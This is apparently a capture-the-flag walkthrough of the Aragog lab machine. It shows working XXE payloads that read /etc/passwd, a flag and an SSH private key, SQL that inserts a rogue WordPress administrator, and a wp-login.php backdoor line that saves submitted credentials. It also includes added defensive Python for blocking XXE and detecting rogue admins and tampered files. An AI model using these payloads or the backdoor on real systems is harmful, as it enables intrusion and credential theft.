As usual, a thorough system enumeration is needed here: Nmap scan -> FTP enumeration -> fuzzing -> web enumeration.

That logically leads to Burp once the php & txt files have been discovered, and then to exploiting an XML External Entity (XXE) injection.

Once connected, database credentials can be found, but they turn out to be a rabbit hole, as they do not lead to anything useful. Going back to system enumeration, I discovered the pspy tool, which greatly eases the process-stalking step needed to grab the much-desired root.txt file.


ENUMERATION

NMAP

Start with a full nmap scan, as usual with Script Scan (-sC) and version detection (-sV) on the whole port range (-p-).

nvko@kali-oscp:~$ nmap -sC -sV -oA nmap-aragog 10.10.10.78 -p-
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-29 15:44 WAT
    Nmap scan report for 10.10.10.78
    Host is up (0.020s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-r--r--r--    1 ftp      ftp            86 Dec 21 16:30 test.txt
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:10.10.14.25
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 3
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
    |   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
    |_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP

Check if FTP allows Anonymous login.

root@kali-oscp:~/htb/machines/aragog# ftp 10.10.10.78
    Connected to 10.10.10.78.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.78:root): anonymous
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
    226 Directory send OK.

ftp> get test.txt
ftp> exit

root@kali-oscp:~/htb/machines/aragog# cat test.txt
    <details>
        <subnet_mask>255.255.255.192</subnet_mask>
        <test></test>
    </details>

So the only interesting information is:
- the subnet mask is a /26
- mput on the FTP server is disabled
- test.txt is a basic XML file

HOSTS

Start by adding the machine to /etc/hosts:

10.10.10.78 aragog aragog.htb


FUZZING

root@kali:/usr/share/wordlists/dirb# dirbuster -u http://10.10.10.78/ -l /usr/share/wordlists/dirb/small.txt 
        Starting OWASP DirBuster 1.0-RC1
        Starting dir/file list based brute forcing
        Dir found: / - 200
        Dir found: /icons/ - 403
        Dir found: /icons/small/ - 403
        File found: /hosts.php - 200
        Dir found: /server-status/ - 403

Ok, so the number of hosts reported by hosts.php corresponds to a /0 netmask.

root@kali # ipcalc 0.0.0.0/0
    Address:   0.0.0.0              00000000.00000000.00000000.00000000
    Netmask:   0.0.0.0 = 0          00000000.00000000.00000000.00000000
    Wildcard:  255.255.255.255      11111111.11111111.11111111.11111111
    =>
    Network:   0.0.0.0/0            00000000.00000000.00000000.00000000
    HostMin:   0.0.0.1              00000000.00000000.00000000.00000001
    HostMax:   255.255.255.254      11111111.11111111.11111111.11111110
    Broadcast: 255.255.255.255      11111111.11111111.11111111.11111111
    Hosts/Net: 4294967294            Class A, In Part Private Internet


EXPLOITATION

XML External Entity (XXE) Processing

So there must be a link between hosts.php and test.txt. Let's try injecting the content of test.txt into a POST request to hosts.php.
1- Start Burp Suite Community Edition
2- "Proxy" tab -> Intercept on
3- Start Firefox and configure the local Burp instance as the proxy
4- Firefox: go to http://10.10.10.78/hosts.php
5- Burp: Action -> Send to Repeater
6- "Repeater" tab
7- In the Request pane:
  change the request method from GET to POST
  paste the content of the test.txt file as the body
  * Go

It seems we can craft a request exploiting XML External Entity (XXE) processing that will let us read files on the system.



Replace the content of test.txt with:

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///etc/passwd">]>
    <details>
        <subnet_mask>&foo;</subnet_mask>
        <test></test>
    </details>

This will return the content of the server's /etc/passwd:

...
    saned:x:119:127::/var/lib/saned:/bin/false
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
    cliff:x:1001:1001::/home/cliff:/bin/bash
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
    ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false

So we have two interesting users: florian & cliff.
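The fix a developer would want for the pattern exploited here, as an added example that is not the box's hosts.php: a Python re-implementation of the host-count logic that refuses DTDs, validates the mask and never echoes unvalidated input. The function names, and the assumption that hosts.php counts usable hosts for a submitted mask, are mine; the sample inputs are constructed from the test.txt and payload above.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed sample inputs: the test.txt served over FTP and the XXE payload.
TEST_TXT = """<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>"""
XXE_PAYLOAD = """<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///etc/passwd">]>
<details><subnet_mask>&foo;</subnet_mask><test></test></details>"""
DOCTYPE_RE = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def usable_hosts(mask: str) -> int:
    """Usable host count for a dotted-quad mask; ValueError if it is not a valid mask."""
    # ipaddress rejects non-contiguous masks and anything that is not an address.
    net = ipaddress.IPv4Network(f"0.0.0.0/{mask}")
    prefix = net.prefixlen
    if prefix >= 31:          # /31 and /32 have no network/broadcast to subtract
        return 2 ** (32 - prefix)
    return 2 ** (32 - prefix) - 2


def hosts_from_xml(body: bytes) -> str:
    """Answer like hosts.php ("There are N possible hosts for MASK"), but safely."""
    text = body.decode("utf-8", errors="strict")
    # 1. Refuse any DTD: the application never needs one, and it is the XXE vector.
    if DOCTYPE_RE.search(text):
        return "error: DTD/entity declarations are not accepted"
    # 2. Parse with ElementTree, which does not fetch external entities.
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return "error: malformed XML"
    mask = (root.findtext("subnet_mask") or "").strip()
    # 3. Validate before use, and only ever reflect the validated value.
    try:
        n = usable_hosts(mask)
    except ValueError:
        return "error: invalid subnet mask"
    return f"There are {n} possible hosts for {mask}"
```

The /0 case from the ipcalc output above (4294967294 hosts) falls out of the same formula, so the count is unchanged for legitimate input; only the reflection of arbitrary data is gone.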


USER FLAG

Let's first try to find the flag file.

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/user.txt">]>
    <details>
        <subnet_mask>&foo;</subnet_mask>
        <test></test>
    </details>

f43bdfbcf.................................


SSH CONNECTION

When I try to connect via SSH, the server only accepts public key authentication.

nvko@kali-oscp:~/htb/machines/aragog$ ssh florian@10.10.10.78
    The authenticity of host '10.10.10.78 (10.10.10.78)' can't be established.
    ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '10.10.10.78' (ECDSA) to the list of known hosts.
    florian@10.10.10.78: Permission denied (publickey).



So let's find the key. Inject these into the POST request:



Public key

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/.ssh/id_rsa.pub">]>
    <details>
        <subnet_mask>&foo;</subnet_mask>
        <test></test>
    </details>
There are 4294967294 possible hosts for ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb



Private key

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/.ssh/id_rsa">]>
    <details>
        <subnet_mask>&foo;</subnet_mask>
        <test></test>
    </details>
There are 4294967294 possible hosts for -----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----



Put both keys into files named florian.pub & florian.priv:

nvko@kali-oscp:~$ chmod 0600 florian.*
nvko@kali-oscp:~$ ssh -i florian.priv florian@10.10.10.78

-> Connected :-)


OS ENUMERATION

LinEnum & some manual enumeration

nvko@kali-oscp:~$ scp -i florian.priv /root/tools/LinEnum.sh florian@10.10.10.78:/home/florian/
florian@aragog:$ chmod +x LinEnum.sh
florian@aragog:$ ./LinEnum.sh
...
    /var/www/html/dev_wiki    <- wordpress with “cliff” as owner
    /var/www/html/dev_wiki/wp-includes/SimplePie <- looks interesting
...
    /var/www/html:
        total 32K
        drwxrwxrwx 4 www-data www-data 4.0K May 30 00:40 .
        drwxr-xr-x 3 root     root     4.0K Dec 18 16:36 ..
        drwxrwxrwx 5 cliff    cliff    4.0K May 30 00:40 dev_wiki
        -rw-r--r-- 1 www-data www-data  689 Dec 21 15:31 hosts.php
        -rw-r--r-- 1 www-data www-data  12K Dec 18 16:36 index.html
        drw-r--r-- 5 cliff    cliff    4.0K Dec 20 16:17 zz_backup
...
    root        936  0.0  0.1  24044  1592 ?        Ss   May27   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
    mysql       958  0.0 14.0 1119988 138156 ?      Ssl  May27   1:41 /usr/sbin/mysqld
...



TL;DR
- cliff is the owner of the /var/www/html/dev_wiki folder
- that folder's permissions are 777
- a MariaDB database is listening on the regular 3306/tcp port
- /var/www/html/dev_wiki/wp-config.php contains the DB credentials

MYSQL ENUMERATION

mysql -u root -p  (password => $@y6CHJ^$#5c37j$#6h)
mysql> select * from wp_users;
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
        | ID | user_login    | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name  |
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
        |  1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com |          | 2017-12-20 23:26:04 |                     |           0 | Administrator |
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
mysql> select * from wp_posts;
...
|  1 |           1 | 2017-12-20 23:26:04 | 2017-12-20 23:26:04 | Hi Florian,
Thought we could use a wiki.  Feel free to log in and have a poke around - but as I'm messing about with a lot of changes I'll probably be restoring the site from backup fairly frequently!
I'll be logging in regularly and will email the wider team when I need some more testers ;-)
Cliff 
...


CREATE WORDPRESS ACCOUNT

As we are admin on the MariaDB database, we can create an admin user for the WordPress CMS (the database is wp_wiki, as in the first two statements; the third originally still had a placeholder database name).

mysql> INSERT INTO wp_wiki.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('4', 'demo', MD5('demo'), 'Your Name', 'test@yourdomain.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');
mysql> INSERT INTO wp_wiki.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');
mysql> INSERT INTO wp_wiki.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
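An account created this way bypasses WordPress entirely, so the place to catch it is the database. As an added example (not from the page or from WordPress), the Python below parses the serialized wp_capabilities value from the INSERT above and lists administrator accounts that are not on an expected list. The sample rows are constructed to mirror the wp_users/wp_usermeta tables; function names are mine.

```python
import re

# Constructed rows: wp_users as ID -> user_login, wp_usermeta as
# (umeta_id, user_id, meta_key, meta_value). WordPress itself stores the role
# flag as b:1; the INSERT above uses s:1:"1", so both forms are handled.
SAMPLE_USERS = {1: "Administrator", 4: "demo"}
SAMPLE_USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 1, "wp_user_level", "10"),
    (3, 4, "wp_capabilities", 'a:1:{s:13:"administrator";s:1:"1";}'),
    (4, 4, "wp_user_level", "10"),
]
_STR = re.compile(r's:(\d+):"')
_BOOL = re.compile(r"b:([01]);")


def _read_string(blob: str, i: int):
    """Read a PHP-serialized s:len:"..."; token at offset i (length-driven, not quote-driven)."""
    m = _STR.match(blob, i)
    if not m:
        raise ValueError(f"expected string at offset {i}")
    n, start = int(m.group(1)), m.end()
    if blob[start + n:start + n + 2] != '";':
        raise ValueError("string length does not match content")
    return blob[start:start + n], start + n + 2


def parse_caps(blob: str) -> dict:
    """Parse the a:N:{s:len:"role";b:1;...} array WordPress keeps in wp_capabilities."""
    m = re.match(r"a:(\d+):\{", blob)
    if not m:
        raise ValueError("not a serialized PHP array")
    count, i, caps = int(m.group(1)), m.end(), {}
    for _ in range(count):
        key, i = _read_string(blob, i)
        b = _BOOL.match(blob, i)
        if b:
            caps[key], i = b.group(1) == "1", b.end()
        else:
            caps[key], i = _read_string(blob, i)
    if blob[i:] != "}":
        raise ValueError("trailing data after array")
    return caps


def rogue_admins(users: dict, usermeta: list, expected: set) -> list:
    """Logins holding the administrator role that are not in `expected`."""
    found = []
    for _, user_id, key, value in usermeta:
        if key == "wp_capabilities" and parse_caps(value).get("administrator") in (True, "1"):
            login = users.get(user_id, f"<unknown id {user_id}>")
            if login not in expected:
                found.append(login)
    return sorted(found)
```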



Now it works: I can log in to WordPress at http://aragog/dev_wiki/wp-admin (demo/demo).

BUT my credentials stop working after a few minutes. It seems some script restores a previous state of the WordPress install ...


PROCESSES STALKING

Upload pspy to the host to watch for recurring processes.

root@kali-oscp:~/personnel_nvko/tools# scp -r -i ../htb/machines/aragog/florian.priv processes/pspy64  florian@10.10.10.78:/home/florian/


Running pspy shows this every single minute.

Ok, so this script is most likely using wp-login.php to log in to the WordPress interface. We simply have to edit the wp-login.php login page to capture the credentials submitted by the wp-login.py script.


To intercept these credentials, add the following at the beginning of the wp-login.php file, right after the "<?php" tag:

$file='/tmp/credentials.txt';
file_put_contents($file,$_POST);


Wait one minute, then ...

These credentials allow logging in to the WordPress blog as Administrator, and escalating from florian to a root shell.
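From the defender's side, the edit to wp-login.php above is a core-file modification that a hash baseline catches on the next check. This is an added example, not part of the page or of WordPress: it baselines the .php files under a web root, reports changes, and flags lines that write request parameters to disk; demo() runs the whole flow on a constructed web root in a temporary directory.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# The pattern used in the edit above: request data written straight to a file.
SUSPICIOUS = re.compile(r"file_put_contents\s*\(.*\$_(POST|REQUEST|GET)")

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(webroot: Path) -> dict:
    """Relative path -> SHA-256 for every .php file under webroot."""
    return {str(p.relative_to(webroot)): sha256_file(p)
            for p in sorted(webroot.rglob("*.php")) if p.is_file()}

def compare_baseline(webroot: Path, baseline: dict) -> dict:
    """Files whose hash changed, plus files added or removed since the baseline."""
    current = build_baseline(webroot)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }

def suspicious_lines(path: Path) -> list:
    """Lines in a PHP file that persist request parameters to disk."""
    return [ln.strip() for ln in path.read_text(errors="replace").splitlines()
            if SUSPICIOUS.search(ln)]

def demo() -> dict:
    """Baseline a constructed wp-login.php, apply the edit from the page, re-check."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        login = root / "wp-login.php"
        login.write_text("<?php\n// constructed stand-in for WordPress' wp-login.php\n")
        baseline = build_baseline(root)   # in practice, keep this outside the web root
        login.write_text("<?php\n$file='/tmp/credentials.txt';\n"
                         "file_put_contents($file,$_POST);\n")
        report = compare_baseline(root, baseline)
        report["suspicious"] = suspicious_lines(login)
        return report
```

Run against the real web root, the baseline has to be taken from a known-good copy and stored where www-data cannot rewrite it, otherwise the restore-from-backup job seen on this box would simply re-baseline the backdoor.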